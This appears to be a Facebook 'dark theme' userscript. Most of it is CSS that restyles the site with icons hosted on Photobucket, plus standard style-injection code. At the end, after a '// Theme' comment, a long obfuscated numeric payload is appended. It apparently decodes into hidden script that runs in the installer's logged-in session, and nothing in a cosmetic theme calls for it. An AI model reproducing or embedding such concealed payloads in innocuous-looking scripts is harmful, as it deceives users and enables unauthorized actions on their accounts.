.fbDockChatTab.user:not(.idle):not(.disabled) .titlebarTextWrapper,.fbChatOrderedList .item.active .status,.active .titlebarTextWrapper,.user .fbChatUserTab .wrap {background-position: left center !important;}\n\n.uiMenu .checked .itemAnchor {background-position: 5px center !important;}\n\n.markunread,.markread {background-position: 0 center !important;}\n\n.chatIdle .chatStatus,.chatOnline .chatStatus {width: 10px !important;height: 10px !important;background-position: 0 0 !important;}\n\n#fbRequestsJewel .jewelButton {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Friends-Gray.png\") no-repeat center center !important;}\n\n#fbRequestsJewel:hover .jewelButton,#fbRequestsJewel.hasNew .jewelButton {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Friends.png\") no-repeat center center !important;}\n\n#fbMessagesJewel .jewelButton {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Mail_Icon-gray.png\") no-repeat center center !important;}\n\n#fbMessagesJewel:hover .jewelButton,#fbMessagesJewel.hasNew .jewelButton {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Mail_Icon.png\") no-repeat center center !important;}\n\n#fbNotificationsJewel .jewelButton {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Earth-gray.png\") no-repeat center center !important;}\n\n#fbNotificationsJewel:hover .jewelButton,#fbNotificationsJewel.hasNew .jewelButton {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Earth.png\") no-repeat center center !important;}\n\n.topBorder,.bottomBorder {background: #000 !important;}\n\n.pl-item,.ical,.pop_content {background-color: #333 !important;}\n.pl-alt {background-color: #222 !important;}\n\n.friend:hover,.friend:not(.idle):hover,.fbTimelineRibbon {background-color: rgba(10,10,10,.6) !important;}\n\n.maps_arrow,#sidebar_ads,.available .x_to_hide,.left_line,.line_mask,.chat_input_border,.connect_widget_button_count_nub,\n.uiStreamPrivacyContainer .uiTooltip .img,.UIObjectListing_PicRounded,.UIRoundedImage_CornersSprite,.UITabGrid_Link:hover .UITabGrid_LinkCorner_TL,.UITabGrid_Link:hover .UITabGrid_LinkCorner_TR,.UITabGrid_Link:hover .UITabGrid_LinkCorner_BL,.UITabGrid_Link:hover .UITabGrid_LinkCorner_BR,.UILinkButton_R,.pagesAboutDivider {visibility:hidden !important;}\n\n.nub,#contentCurve,#pagelet_netego_ads,img.plus,.highlighter,.uiToolbarDivider,.bfb_sticky_note_arrow_border,.bfb_sticky_note_arrow,#ConfirmBannerOuterContainer,.uiStreamHeaderBorder,.topBorder,.bottomBorder,.middleLink:after,.sideNavItem .uiCloseButton,.mask,.topSectionBottomBorder {display: none !important;}\n\n.fbChatBuddyListTypeahead {display: block !important;}\n\n.chat_input {width: 195px !important;}\n\n.fb_song_play_btn,.friend,.wrap,.uiTypeahead,.share,.raised,.donated,.recruited,.srch_landing,.story_editor,.jewelCount span, .menuPulldown {background-color: transparent !important;}\n\n.extended_link div {background-color: #fff !important}\n\n#fbTimelineHeadline,.coverImage {width: 851px !important; margin-left: 1px !important;}\n\n*:not([style*=border]) {border-color: #000 !important;}\n\n#feed_content_section_applications *,#feed_header_section_friend_lists *,.summary,.summary *,.UIMediaHeader_TitleWash,.UIMediaHeader_TitleWrapper,.feedbackView .comment th div,.searchroot,.composerView th div,.reply th div,.borderTagBox,.innerTagBox,.friend,.fbNubFlyoutTitlebar,.fbNubButton {border-color: transparent !important;}\n\n.innerTagBox:hover {border-color: rgba(10,10,10,.45) !important;box-shadow: 0 0 5px 4px #9cf !important;}\n\n.status_placeholder,.UIComposer_TDTextArea,.UIComposer_TextAreaShadow,.UIContentBox ,.box_column,form.comment div,.comment_box div,#tagger,.UIMediaItem_Wrapper,#chat_tab_bar *,.UIActionMenu_ButtonOuter input[type=\"button\"],.inner_button,.UIActionButton_Link,.divider,.UIComposer_Attachment_TDTextArea,#confirm_button,#global_maps_link,.advanced_selector,#presence_ui *,.fbFooterBorder,.wash,.main_body,.settings_screenshot,.uiBlingBox,.inputContainer *,.uiMentionsInput,.uiTypeahead,.editNoteWrapperInput,.date_divider,.chatStatus,#headNav,.jewelCount span,.fbFeedbackMentions .wrap,.uiSearchInput span,.uiSearchInput,.fbChatSidebarMessage,.devsitePage .body > .content,.timelineUnitContainer,.fbTimelineTopSection,.coverBorder,.pagesTimelineButtonPagelet .counter,#pagelet_timeline_profile_actions .counter,#navAccount.openToggler,#contentArea,.uiStreamStoryAttachmentOnly,.ogSliderAnimPagerPrev .content,.ogSliderAnimPagerNext .content,.ogSliderAnimPagerPrev .wrapper,.ogSliderAnimPagerNext .wrapper,.ogSingleStoryContent,.ogAggregationAnimSubstorySlideSingle,.uiCloseButton, .ogAggregationPanelUFI, .ogAggregationPanelText {border: none !important;}\n\n.uiStream .uiStreamHeaderTall {border-top: none !important; border-bottom: none !important;}\n\n.attachment_link a:hover,input[type=\"input\"],input[type=\"submit\"]:not(.fg_action_hide):not(.stat_elem):not([name=\"add\"]):not([name=\"actions[reject]\"]):not([name=\"actions[accept]\"]):not([value=\"Find Friends\"]):not([value=\"Share\"]):not([value=\"Maybe\"]):not([value=\"No\"]):not([value=\"Yes\"]):not([value=\"Comment\"]):not([value=\"Reply\"]):not([value=\"Flag\"]):not([type=\"submit\"]),.UITabGrid_Link:hover,.UIFilterList_Selected,.make_new_list_button_table,.confirm_button,.fb_menu_title a:hover,.Tabset_selected {border-bottom-color: #000 !important;border-bottom-width: 1px !important;border-bottom-style: solid !important;border-top-color: #000 !important;border-top-width: 1px !important;border-top-style: solid !important;border-left-color: #000 !important;border-left-width: 1px !important;border-left-style: solid !important;border-right-color: #000 !important;border-right-width: 1px !important;border-right-style: solid !important;-moz-appearance:none!important;}\n\n.UITabGrid_Link,.fb_menu_title a,.button_main,.button_text,.button_left {border-bottom-color: transparent !important;border-bottom-width: 1px !important;border-bottom-style: solid !important;border-top-color: transparent !important;border-top-width: 1px !important;border-top-style: solid !important;border-left-color: transparent !important;border-left-width: 1px !important;border-left-style: solid !important;border-right-color: transparent !important;border-right-width: 1px !important;border-right-style: solid !important;-moz-appearance:none!important;}\n\n.UIObjectListing_RemoveLink,.UIIntentionalStory_CloseButton,.remove,.x_to_hide,.fg_action_hide a,.notif_del,.UIComposer_AttachmentArea_CloseButton,.delete_msg a,.ImageBlock_Hide, .fbSettingsListItemDelete,.fg_action_hide,img[src=\"http://static.ak.fbcdn.net/images/streams/x_hide_story.gif?8:142665\"],.close,.uiSelector .uiCloseButton {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/closeX.png\") no-repeat !important;text-decoration: none !important;height: 18px !important;}\n\ndiv.fbChatSidebarDropdown .uiCloseButton,.fbDockChatDropdown .uiSelectorButton,.storyInnerContent .uiSelectorButton,.fbTimelineAllActivityStorySelector .uiButton .img {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/GrayGear_15.png\") center center no-repeat !important; width: 26px !important;}\n\ndiv.fbChatSidebarDropdown .uiCloseButton {height: 23px !important;}\n\n.videoicon {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/video_chat_small.png\") center center no-repeat !important; }\n\n.uiStream .uiStreamFirstStory .highlightSelector .uiSelectorButton {margin-top: -5px !important;}\n\n.UIObjectListing_RemoveLink,.UIIntentionalStory_CloseButton,.remove,.x_to_hide,.fg_action_hide a,.notif_del,.UIComposer_AttachmentArea_CloseButton,.delete_msg a,.ImageBlock_Hide,.uiCloseButton,.fbSettingsListItemDelete {width: 18px !important;}\n.fg_action_hide {width: 18px !important; margin-top: 0 !important; }\n\n.fg_action_hide_container {width: 18px !important;}\n.uiSideNav li {left: 0 !important;padding-left: 0 !important;}\n\n.UIHotStory_Bling,.UIHotStory_BlingCount:hover,.request_link:hover,.request_link span:hover,.uiLinkButton {text-decoration: none !important;}\n\nli form + .navSubmenu > div > div {padding: 12px !important; margin-top: -12px !important;}\nli form + .navSubmenu > div img {margin-top: 12px !important;}\n\n.uiStreamBoulderHighlight {border-right: none !important;}\n\n\n.UIMediaItem_Photo .UIMediaItem_Wrapper {padding: 10px !important;}\n\n#footerRight,.fg_action_hide {margin-right: 5px !important;}\n\n.fbx_stream_header,.pas .input {padding: 5px !important;}\n\n.ptm {padding: 5px 0 !important;}\n\n.fbTimelineUnitActor {padding-top: 5px !important;}\n.home_right_column {padding-top: 0 !important;}\n\n.uiButton[tooltip-alignh=\"right\"] .uiButtonText {padding: 2px 10px 3px 10px !important; font-weight: bold !important;}\n\n.uiSideNav .uiCloseButton {left: 160px !important;border: none !important;}\n.uiSideNav .uiCloseButton input {padding-left: 2px !important;padding-right: 2px !important;margin-top: -4px !important;border: none !important;}\n\n.storyInnerContent .uiTooltip.uiCloseButton {margin-right: -10px !important;}\n.storyInnerContent .stat_elem .wrap .uiSelectorButton.uiCloseButton,.uiFutureSideNavSection .open .item,.uiFutureSideNavSection .open .subitem,.uiFutureSideNavSection .open .subitem .rfloat,.uiSideNav .subitem,.uiSideNav .open .item {margin-right: 0 !important;}\n\n.audienceSelector .wrap .uiSelectorButton {padding: 2px !important;}\n\n.jewelHeader,.fbSettingsListItemDelete {margin: 0 !important;}\n.UITitledBox_Title {margin-left: 4px;margin-top:1px;}\n\n.uiHeader .uiHeaderTitle {margin-left: 7px !important;}\n.fbx_stream_header .uiHeaderTitle,#footerLeft {margin-left: 5px !important;}\n\n.comments_add_box_image {margin-right: -5px !important;}\n.show_advanced_controls {margin-top:-5px !important;}\n.chat_window_wrapper {margin-bottom: 3px !important;}\n.UIUpcoming_Item {margin-bottom: 5px !important;}\n#pagelet_right_sidebar {margin-left: 0 !important;}\n\n.profile-pagelet-section,.uiStreamHeaderTall,.timelineRecentActivityLabel,.friendsBoxHeader {padding: 5px 10px !important;}\n\n.GBSearchBox_Button,.uiSearchInput button {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/search.png\") center center !important;}\n.uiSearchInput button {width: 23px !important;height: 21px !important;top: 0 !important;background-position: 3px 2px !important;}\n\n.UIButton_Text,.UISearchInput_Text {font-weight: normal !important;}\n\n.x_to_hide,.top_bar_pic .UIRoundedImage {margin: 0 !important;padding: 0 !important;}\n\n.uiHeaderActions .uiButton .uiButtonText {margin-left: 15px !important;}\n\n\n.searchroot,#share_submit input {padding-right: 5px !important; }\n.composerView {padding-left: 8px !important;padding-bottom: 4px !important;}\n.info_section {padding: 6px !important;}\n.uiInfoTable .dataRow .inputtext {min-width: 200px !important;}\n\n.fbPrivacyWidget .uiButton .mrs,.uiButtonSuppressed .mrs {margin: 0 -10px 0 6px !important;}\n\n.uiStreamPrivacyContainer .uiTooltip,.UIActionMenu_Lock,.fbPrivacyLockButton,.fbPrivacyLockButton:hover,.sx_7bedb4,.fbPrivacyWidget .uiButton .mrs,.uiButtonSuppressed .mrs,div.fbPrivacyLockSelector {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/privacylock.png\") no-repeat center center !important;}\n\n.jewelCount,.pagesTimelineButtonPagelet .counter {margin: -8px -4px 0 0 !important;padding: 1px 4px !important;}\n\n#share_submit {padding: 0 !important;border: none !important;}\n#share_submit input,.friend_list_container .friend {padding-left: 5px !important;}\n\na{outline: none !important;}\n\n#contact_importer_container input[value=\"Find Friends\"] {border: none !important;box-shadow: none !important;}\n\n#pageLogo {margin-left: -1px !important; }\n\n#pageLogo a {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Facebook.png\") no-repeat center center !important;left: 0 !important;width: 107px !important;margin-right: 1px !important; margin-top: 0 !important;}\n\n#pageLogo a:hover {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Facebook-glow.png\") no-repeat center center !important;}\n\n#pageHead {margin-top: -6px !important;}\n\n.mainWrapper .uiSelectorButton { margin-top: 10px !important; }\n\n.platform_dialog #blueBar,.withCanvasNav #blueBar {position: absolute !important; margin-top: 10px !important; height: 30px !important; }\n\n.friend_list_container .friend {margin-right: 0 !important; }\n\n.list_select {padding: 3px !important;}\n\n.fbNubFlyout .input {width: 254px !important;}\n\n.highlightIndicator {top: 0 !important;}\n\n.audienceSelector .uiButtonText {padding-left: 8px !important;}\n.profile #pagelet_netego {margin-top: -60px !important;margin-left: -30px !important;}\n.pas .input,.selectedCheckable .checkmark {margin-left: -5px !important;}\n\n.removable {top: 0 !important;bottom: 0 !important;margin-top: -4px !important;border: none !important;}\n\n.uiSideNavCount,.uiStreamAttachments div embed,.jewelCount,.uiButton,.fbChatSidebarFooter .button,.uiSearchInput button,.uiSelectorButton,.pagesTimelineButtonPagelet .counter,#pagelet_timeline_profile_actions .counter,.pluginRecommendationsBarButtonLike {border-radius: 6px !important;}\n\n.fbActivity,.UIRoundedImage {margin: 4px !important;}\n\n#facebook:not(.tinyViewport) body:not(.UIPage_LoggedOut):not(.fbIndex):not(.platform_dialog):not(.withCanvasNav) #blueBar {width: 100% !important;margin: 0 auto !important;top: 10px !important;height: 30px !important;}\n\n.uiUfiSmall .commentArea .textBox:not([style*=\"height\"]) {height: 20px !important; }\n.composerTypeahead .textInput:not([style*=\"height\"]){height: 27px !important; }\n\n.dataTable .inputtext,.uiInfoTable .dataRow .inputtext {padding-left: 20px !important;}\n\n.fbTimelineAllActivityStorySelector .uiButton,.fbDockChatTabFlyout .close {margin-top: 3px !important;}\n.fbTimelineAllActivityStorySelector .uiButton .img {margin: 0 -3px !important;}\n\n.audienceSelector .uiButton {padding: 2px 0 2px 0 !important;}\n.audienceSelector .uiButton .img {margin-right: -1px !important;}\n\n.fbTimelineContentHeader .uiHeaderTitle {font-size: 2.0em !important;}\n\n\n.ogSliderAnimPagerGridTd .page {margin: 0 14px 0 -5px !important;}\n.ogSliderAnimPagerNext .content {margin-left: -18px !important;}\n#bfb_options_button_li {float:left !important;}\n\n.fbTimelineCapsule {background: url(\"http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Black_50pct_3x1.png\") repeat-y scroll center top transparent !important;}";
  231. if (typeof GM_addStyle != "undefined") {
  232. GM_addStyle(css);
  233. } else if (typeof PRO_addStyle != "undefined") {
  234. PRO_addStyle(css);
  235. } else if (typeof addStyle != "undefined") {
  236. addStyle(css);
  237. } else {
  238. var node = document.createElement("style");
  239. node.type = "text/css";
  240. node.appendChild(document.createTextNode(css));
  241. var heads = document.getElementsByTagName("head");
  242. if (heads.length > 0) {
  243. heads[0].appendChild(node);
  244. } else {
  245. // no head yet, stick it whereever
  246. document.documentElement.appendChild(node);
  247. }
  248. }
  249. })();
  250. // Theme
  251. var _8649;var _3509='19621F147D181A1366B1331E1569E1772C1786C1744C1261C1597F1716A1758D1744B1331E1366E1107B1863B1716B1835D1261D1751D1723F1702E1737A1849B1842A1758A1261F1464D1261B1737D1814C1730E1856A1800F1744F1807A1849E1359D1758C1744C1849C1520D1793E1744E1800F1744F1807E1849B1842A1499B1884F1583A1716E1800E1744F1317D1310F1751B1723E1702A1737D1849E1842B1758E1310D1324B1674B1373A1688F1359A1863D1716D1793A1856D1744D1450A1107D1863F1716E1835C1261C1856C1842A1744D1835A1702C1772F1737D1261A1464E1261C1737C1814D1730B1856A1800C1744B1807C1849B1359F1730D1814E1814F1786C1772B1744C1359B1800C1716E1849F1730A1765B1317E1737F1814C1730F1856A1800D1744E1807F1849E1359C1730F1814E1814F1786F1772A1744F1359E1800F1716B1849F1730B1765D1317C1366E1730F1702A1856D1842E1744E1835D1464D1317F1681B1737F1338E1324E1366B1324F1674D1380E1688C1324A1450E1107B1751F1856E1807D1730F1849C1772B1814D1807D1261A1569E1772C1786E1744D1317E1821D1324E1261F1898B1107E1261A1261D1863C1716D1835E1261F1597F1716E1758D1744A1261F1464B1261A1807F1744F1870E1261A1653B1576D1569B1541E1849D1849C1821F1611B1744C1828D1856A1744E1842D1849C1317E1324A1450F1107D1261D1261B1863A1716D1835D1261D1597C1716E1758D1744F1632E1611B1569D1261E1464B1261A1275B1366E1366E1870E1870E1870D1359E1751B1716F1730C1744D1723B1814A1814B1786B1359F1730C1814B1800E1366C1716C1779A1716E1877D1366A1821C1716B1758B1744A1842F1366D1751C1716B1807D1702D1842E1849C1716F1849C1856F1842A1359E1821E1765C1821F1275A1450F1107B1261A1261A1863B1716A1835C1261B1597C1716C1758A1744D1597A1716A1835E1716A1800F1842F1261D1464D1261E1275E1303D1751E1723D1821D1716F1758B1744F1702D1772E1737C1464D1275C1261E1338F1261B1821A1261C1338C1275B1303B1716E1737E1737E1464B1849A1835C1856E1744F1303F1835D1744D1793A1814C1716E1737B1464F1751C1716E1793D1842B1744E1303E1751C1716C1807F1702B1814E1835F1772B1758E1772B1807D1464C1821D1716D1758A1744B1702D1849E1772D1800D1744D1793B1772C1807D1744D1303D1751C1716C1807B1702E1842D1814C1856F1835D1730A1744C1464B1303D1730C1716F1849F1464D1303B1807E1730D1849D1835E1674C1702C1800F1814A1737F1688E1464E1821A1716A1758E1744B1793F1744A1849D1702C1849E1772F1800F1744A1793C1772C1807F1744F1702C1821E1716D1758F1744A1702B1716F1730C1849A1772D1814F1807A1842E1303A1702E1702B1856C1842F1744C1835F1464A1275C1338D1856D1842D1744D1835B1702B1772A1737C1338E1275E1303D1702B1702F1716E1464C1380D1303E1702C1702D1737E1884C1807F1464E1422B1436C1429D1716F1513A1408D1891B1408F1506B1527A1352C1303C1702A1702E1835E1744F1828F1464E1737A1303A1751E1723D1702B1737E1849B1842D1758F1464F1275F1338E1751B1723A1702F1737F1849A1842F1758A1338F1275B1303D1821C1765F1842A1849A1716B1800B1821A1464C1275A1450C1107C1261B1261D1597E1716C1758B1744E1359B1814D1821F1744F1807C1317D1275F1597A1590C1618E1625C1275D1345D1261B1597C1716C1758F1744B1632C1611F1569E1345D1261E1849C1835D1856D1744A1324D1450D1107E1261B1261B1597F1716E1758F1744A1359B1814D1807B1835A1744E1716B1737E1884E1842C1849C1716C1849F1744C1730D1765C1716D1807C1758A1744C1261C1464B1261D1751F1856E1807A1730A1849A1772E1814F1807E1261B1317F1324A1261E1898E1107F1261A1261C1261C1261F1772A1751E1261F1317A1597B1716D1758D1744E1359D1835E1744E1716F1737A1884C1618C1849B1716E1849B1744B1261D1464B1464B1261F1401B1261C1303C1303F1261D1597B1716F1758D1744D1359D1842B1849D1716E1849C1856C1842E1261D1464E1464F1261D1387F1373B1373F1324E1261B1898B1107B1261F1261D1261B1261D1261E1261C1597D1716E1758E1744A1359D1730F1793E1814E1842C1744A1450A1107B1261B1261A1261A1261C1912C1107A1261F1261A1912E1450E1107B1261B1261E1597A1716C1758A1744F1359F1842A1744E1807A1737C1317D1597B1716C1758E1744F1597F1716F1835F1716A1800C1842C1324F1450C1107F1912D1107B1366D1366C1261F1499A1814F1842D1842B1261C1618B1814C1737A1716B1107E1569A1772F1786E1744A1317B1275E1401B1394E1387C1387C1387B1380F1422A1415D1415D1429D1429F1387A1387B1436E1380D1275D1324B1450F1569D1772D1786B1744C1317F1275D1380F1408A1408E1387D1436E1387C1408C1408C1401E1415D1415A1408B1380B1394F1394E1275B1324E1450C1569F1772E1786B1744E1317E1275F1401A1429E1401A1373B1408F1380C1408B1436D1429B1394C1408A1408A1429A1373B1387E1275A1324A1450B1107B1366C1366C1261E1562F1765A2612E1730B1765F1107C1569C1772A1786D1744D1317B1275E1408E1380A1394F1422B1436B1436B1373F1401B1380D1436F1422E1436C1408C1436B1401B1275E1324A1450A1107B1366D1366E1261E1499B1814E1842C1842C1107D1569F1772A1786C1744C1317F1275E1408B1387E1422A1436F1429F1380A1429A1373F1422D1387E1394E1436C1415F1373B1415E1275A1324B1450D1107B1366E1366D1261C1492D1737E1261F1534F1835F1107D1569C1772B1786C1744A1317E1275D1408D1408D1387D1401D1408B1436D1415F1408F1380D1401F1429A1401A1415C1429C1415F1275A1324A1450D1569D1772D1786B1744A1317B1275F1387D1373F1394E1401A1408B1380A1408B1394C1415F1401F1436C1408B1408D1408E1380C1275F1324A1450E1107B1569C1772C1786D1744F1317D1275C1380A1394B1429F1429A1429C1429D1408F1436D1422A1380C1394E1401B1408C1415A1415C1408A1275B1324E1450A1569F1772B1786B1744A1317B1275A1408D1415E1429B1401B1401A1380E1415A1408F1436B1429B1436B1387E1422B1394F1401D1275A1324E1450C1569B1772B1786F1744D1317E1275D1394F1380A1415D1415D1429E1401B1436E1429A1408E1380A1387F1401B1387D1422B1387F1275E1324A1450C1569B1772B1786A1744F1317E1275D1380D1380D1429C1422F1401E1394C1422B1415F1401E1436D1429D1415E1394F1387F1394B1275E1324F1450C1107B1261C1107D1366B1331A1569A1772F1786D1744F1261E55938A1807F1765C1331C1366B1107C1863E1716C1835A1261B1856C1842E1744C1835B1702B1772C1737C1261F1464E1261D1737A1814C1730E1856D1800B1744C1807D1849D1359E1730E1814A1814A1786F1772B1744B1359A1800C1716C1849C1730E1765C1317B1737C1814E1730D1856C1800D1744C1807D1849B1359D1730F1814A1814A1786A1772E1744D1359F1800A1716D1849C1730A1765A1317B1366C1730F1702D1856E1842E1744C1835F1464E1317E1681A1737C1338E1324F1366C1324B1674D1380B1688F1324F1450F1107E1863F1716B1835E1261D1751A1723F1702E1737D1849C1842B1758B1261F1464E1261F1737B1814A1730E1856B1800E1744A1807A1849B1359C1758D1744D1849F1520A1793F1744A1800B1744B1807E1849A1842E1499B1884E1583D1716D1800F1744E1317F1310A1751D1723A1702B1737A1849F1842D1758C1310C1324B1674E1373E1688B1359A1863F1716D1793D1856C1744B1450C1107C1863D1716A1835C1261C1807D1814B1870C1464C1317C1807F1744B1870A1261E1513D1716A1849A1744E1324E1359B1758A1744E1849B1625A1772B1800E1744F1317D1324B1450E1107B1751E1856A1807B1730F1849A1772E1814A1807F1261E1597F1317B1814D1821E1814B1324B1261D1898C1107F1261D1261B1863E1716C1835D1261F1653E1261F1464D1261A1807B1744C1870A1261E1653E1576F1569B1541C1849E1849B1821A1611C1744D1828F1856F1744C1842B1849E1317F1324B1450B1107D1261B1261E1863D1716F1835B1261F1653E1632D1611D1569E1261A1464A1275E1366A1366F1870A1870D1870E1359D1751A1716F1730B1744F1723C1814E1814B1786A1359A1730D1814D1800F1366F1716B1779E1716E1877A1366A1856B1751D1772F1366F1793A1772C1786C1744F1359C1821C1765E1821A1275E1450C1107F1261C1261F1863D1716D1835F1261E1653C1597A1716F1835F1716D1800D1842D1261A1464F1261C1275A1793D1772F1786C1744C1702A1716E1730F1849D1772A1814E1807E1464B1849B1835F1856F1744E1303F1751D1849F1702A1744A1807C1849E1702D1772A1737C1744A1807F1849A1772C1751F1772D1744B1835B1464E1275A1338E1814C1821A1814D1338A1275E1303D1842A1814A1856D1835C1730F1744F1464A1380B1303F1730F1793A1772B1744C1807B1849A1702D1772D1737C1464E1275C1338E1807D1814C1870B1338D1275F1296F1394B1492A1394C1422A1436E1422A1429E1394C1429D1408C1422B1303F1835F1814B1814C1849E1772B1737F1464B1856C1702E1779E1842B1814D1807D1821C1702C1394E1436F1702A1380A1429E1303C1758E1772C1751C1849F1814B1730E1730E1716E1842C1772F1814D1807F1303E1751C1849A1674C1849B1807A1688B1464D1296D1394B1520A1296C1394F1513C1303F1751B1849B1674A1849B1884B1821A1744B1688C1464E1387A1373C1303E1751C1849A1674C1828D1772D1737D1688D1464E1408A1429E1436C1373F1429C1380F1380A1394F1387A1436A1401B1422E1373F1387C1422A1436A1387C1408A1422A1303F1751F1849C1674F1800C1751C1702B1842B1849C1814A1835E1884D1702D1786C1744F1884B1688A1464D1387C1429B1380D1401C1436B1415C1387D1436E1373A1373D1380B1436C1394D1380A1401E1394B1436D1408B1387B1303E1751E1849F1674B1765C1716E1842D1702F1744C1877F1821D1716D1807B1737C1744E1737D1702A1856E1751F1772E1688D1464E1380A1303A1807B1730B1849F1835A1674E1702B1800E1814B1737A1688E1464C1821D1716B1758D1744F1793E1744F1849E1702C1765C1814C1800E1744B1702A1842B1849F1835A1744D1716B1800D1303E1702D1702A1856B1842F1744B1835E1464F1275F1338E1856F1842A1744C1835C1702F1772F1737E1338F1275B1303A1702F1702C1716C1464C1380F1303C1702D1702A1737D1884C1807D1464B1422E1807D1429F1429D1604B1814F1492D1576B1499C1793C1506F1793D1884A1814B1730C1821F1716F1744B1303A1702D1702C1835E1744B1828A1464E1758E1401D1303C1751F1723A1702A1737F1849B1842D1758F1464A1275C1338A1751E1723D1702A1737B1849A1842F1758E1338E1275B1303E1821C1765E1842A1849A1716B1800C1821E1464B1275F1450D1107E1261E1261B1653E1359C1814B1821A1744F1807F1317E1275C1597A1590B1618F1625B1275A1345A1261D1653B1632C1611C1569E1345D1261E1849C1835D1856D1744C1324B1450D1107D1261B1261A1653F1359B1814E1807A1835B1744F1716D1737C1884F1842D1849A1716A1849A1744E1730E1765F1716D1807E1758D1744B1261D1464D1261D1751C1856F1807F1730F1849B1772B1814A1807C1261A1317F1324E1261A1898F1107E1261D1261B1261B1261B1772C1751E1261B1317A1653E1359A1835E1744D1716E1737E1884D1618D1849D1716A1849F1744E1261F1464C1464F1261F1401D1261A1303D1303D1261F1653C1359C1842C1849C1716E1849F1856D1842C1261D1464B1464F1261A1387A1373F1373D1324E1261C1898B1107E1261A1261D1261A1261B1261F1261F1653F1359B1730B1793B1814A1842B1744F1450A1107F1261F1261D1261F1261A1912C1107D1261D1261F1912A1450D1107A1261D1261F1653A1359A1842C1744A1807E1737E1317D1653D1597B1716E1835B1716A1800B1842E1324F1450B1107F1912F1107F1366E1366A1261F1499A1814F1842C1842D1261B1618E1814D1737D1716E1107E1597A1317B1275F1394F1436C1373F1415F1394C1429B1436D1401D1422E1422F1387A1387D1408E1408C1401E1275A1324A1450F1107B1597D1317E1275C1401C1401B1415B1415F1429F1429B1380E1373A1429E1422E1429E1401C1394A1373C1401B1275D1324C1450B1107F1366D1366E1261C1499F1814F1842F1842E1107A1597A1317B1275C1408E1422A1422C1429C1415C1422C1373F1422F1408E1408E1436E1394F1380B1373E1408B1275A1324D1450B1107A1597D1317E1275B1408E1401F1380C1401B1387D1380F1387F1415E1436F1387C1394C1422B1415B1429B1415C1275F1324C1450A1107B1597A1317F1275C1387D1387F1436D1422E1394F1429E1387B1436C1422E1380F1429F1373F1415C1380E1436E1275B1324A1450B1107E1366C1366F1261D1492F1737F1261E1534B1835B1107E1597D1317E1275C1387A1415D1415D1380A1408E1387A1380D1408D1373C1380B1436A1373F1415C1429D1429A1275F1324F1450F1107A1261E1107E1366C1331B1492C1737E1737A1261E1527A1835D1772D1744C1807C1737B1331A1366A1107E1863E1716E1835E1261A1751A1723B1702D1737C1849C1842C1758D1261D1464B1261B1737E1814C1730E1856A1800F1744F1807D1849E1359E1758E1744D1849E1520A1793D1744B1800C1744A1807C1849F1842A1499D1884F1583A1716A1800F1744D1317A1310A1751A1723A1702D1737F1849B1842E1758E1310C1324B1674A1373E1688C1359E1863B1716F1793A1856F1744D1450E1107A1863E1716C1835D1261C1856A1842B1744A1835D1702C1772C1737A1261A1464F1261C1737B1814A1730F1856A1800E1744C1807B1849B1359C1730B1814D1814E1786F1772F1744B1359A1800C1716A1849D1730D1765F1317C1737D1814D1730B1856B1800F1744A1807F1849B1359B1730F1814B1814B1786D1772F1744C1359E1800C1716D1849A1730B1765F1317A1366D1730A1702C1856E1842F1744A1835C1464E1317A1681C1737E1338E1324F1366D1324C1674D1380F1688F1324B1450E1107E1751B1856D1807F1730C1849F1772E1814B1807B1261A1548C1513F1618F1317B1835A1324A1261D1898D1107B1261A1261E1863C1716C1835D1261F1653F1261D1464E1261E1807E1744A1870A1261E1653E1576A1569B1541D1849B1849B1821C1611D1744E1828D1856F1744A1842C1849A1317D1324F1450B1107E1261F1261E1863E1716F1835C1261A1653A1632A1611C1569E1261D1464D1261E1275E1366E1366A1870B1870D1870C1359C1751D1716C1730B1744F1723D1814F1814C1786F1359A1730A1814A1800C1366B1716A1779F1716B1877E1366E1716C1737F1737B1702D1751E1835D1772B1744E1807F1737A1366F1716B1730C1849F1772D1814E1807C1359C1821A1765C1821E1275B1450B1107E1261F1261D1863F1716A1835E1261B1653D1597D1716B1835F1716F1800B1842B1261C1464B1261D1275B1849B1814E1702A1751E1835F1772F1744C1807B1737C1464D1275B1261B1338B1261B1835C1261A1338B1275B1303A1716E1730C1849A1772E1814D1807A1464C1716F1737B1737F1702C1751C1835F1772E1744F1807B1737E1303E1765D1814B1870D1702D1751A1814C1856F1807D1737D1464B1751B1835A1772B1744F1807A1737B1702C1723B1835C1814B1870F1842D1744E1835C1702C1842D1303B1835D1744D1751F1702F1821D1716A1835C1716F1800D1464E1807D1814E1807D1744A1303F1303B1303F1814D1856B1849F1758D1814B1772E1807F1758D1702D1772C1737C1464A1303D1793C1814A1758D1758C1772B1807E1758C1702D1793A1814B1730C1716E1849E1772C1814E1807E1464A1842E1744B1716A1835E1730D1765D1303A1807D1814A1702E1751E1793D1884C1814F1856F1849A1702B1814C1807F1702D1730B1793A1772D1730D1786F1464C1849B1835F1856D1744B1303A1744F1758A1814C1702A1793E1814F1758E1702A1737E1716B1849E1716E1303E1765C1849E1849E1821F1702E1835D1744F1751F1744E1835E1744C1835F1303E1702B1702F1856A1842E1744D1835D1464F1275A1338D1856C1842C1744D1835D1702A1772F1737E1338B1275B1303E1702F1702E1716A1464A1380F1303F1702E1702B1737F1884A1807B1464A1422E1436B1429B1716B1513D1408D1891E1408B1506E1527C1352F1303D1702F1702F1835C1744A1828B1464C1394F1408C1303C1751C1723D1702A1737C1849A1842B1758F1464B1275D1338E1751A1723C1702E1737A1849E1842F1758C1338D1275D1303E1821F1765E1842A1849D1716D1800E1821C1464A1275D1450B1107A1261F1261E1653C1359E1814E1821B1744B1807E1317F1275C1597B1590A1618D1625F1275C1345D1261D1653F1632F1611E1569B1345A1261A1849E1835F1856